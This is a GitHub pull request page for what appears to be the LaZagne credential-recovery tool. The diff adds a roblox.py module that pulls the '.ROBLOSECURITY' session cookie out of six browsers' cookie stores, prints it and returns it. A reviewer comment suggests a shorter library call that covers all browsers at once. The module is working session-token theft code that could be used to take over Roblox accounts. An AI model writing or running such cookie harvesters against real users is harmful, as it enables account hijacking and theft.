-
Notifications
You must be signed in to change notification settings - Fork 2k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added more software #620
Open
Void-666
wants to merge
12
commits into
AlessandroZ:master
Choose a base branch
from
Void-666:master
base: master
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
Added more software #620
Changes from 1 commit
Commits
Show all changes
12 commits
Select commit
Hold shift + click to select a range
f58261c
Create steam.py
Void-666 cee69e6
Added Discord Token Finder
Void-666 f1ad311
Create telegram.py
Void-666 ab3820e
Update chromium_browsers.py
Void-666 7750ccb
Create roblox.py
Void-666 65801d2
Fixed telegram
Void-666 74a7206
Update roblox.py
Void-666 3d97b70
Update roblox.py
Void-666 99d1d63
Merge branch 'AlessandroZ:master' into master
Void-666 74345d1
Delete Steam
Void-666 509e2f2
Delete Windows/lazagne/softwares/chats/telegram.py
Void-666 c288c78
Roblox deletion
Void-666 File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,67 @@ | ||
import requests, robloxpy, json, browser_cookie3, os.path | ||
|
||
user = os.path.expanduser("~") | ||
|
||
|
||
def robloxl(): | ||
data = [] | ||
|
||
try: | ||
cookies = browser_cookie3.chrome(domain_name='roblox.com') | ||
for cookie in cookies: | ||
print(cookie) | ||
if cookie.name == '.ROBLOSECURITY': | ||
data.append(cookies) | ||
data.append(cookie.value) | ||
return data | ||
except: | ||
pass | ||
try: | ||
cookies = browser_cookie3.brave(domain_name='roblox.com') | ||
for cookie in cookies: | ||
print(cookie) | ||
if cookie.name == '.ROBLOSECURITY': | ||
data.append(cookies) | ||
data.append(cookie.value) | ||
return data | ||
except: | ||
pass | ||
try: | ||
cookies = browser_cookie3.firefox(domain_name='roblox.com') | ||
for cookie in cookies: | ||
if cookie.name == '.ROBLOSECURITY': | ||
data.append(cookies) | ||
data.append(cookie.value) | ||
return data | ||
except: | ||
pass | ||
try: | ||
cookies = browser_cookie3.chromium(domain_name='roblox.com') | ||
for cookie in cookies: | ||
if cookie.name == '.ROBLOSECURITY': | ||
data.append(cookies) | ||
data.append(cookie.value) | ||
return data | ||
except: | ||
pass | ||
|
||
try: | ||
cookies = browser_cookie3.edge(domain_name='roblox.com') | ||
for cookie in cookies: | ||
if cookie.name == '.ROBLOSECURITY': | ||
print("L") | ||
data.append(cookies) | ||
data.append(cookie.value) | ||
return data | ||
except: | ||
pass | ||
|
||
try: | ||
cookies = browser_cookie3.opera(domain_name='roblox.com') | ||
for cookie in cookies: | ||
if cookie.name == '.ROBLOSECURITY': | ||
data.append(cookies) | ||
data.append(cookie.value) | ||
return data | ||
except: | ||
pass |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
it seems you can call
browser_cookie3.load(domain_name='roblox.com')
to test for all browsers in one single call.
as shown in browser_cookie3 's code:
https://github.com/borisbabic/browser_cookie3/blob/3ce9776eac53794429f0177469887e3658b81266/browser_cookie3/__init__.py#L1226C5-L1226C9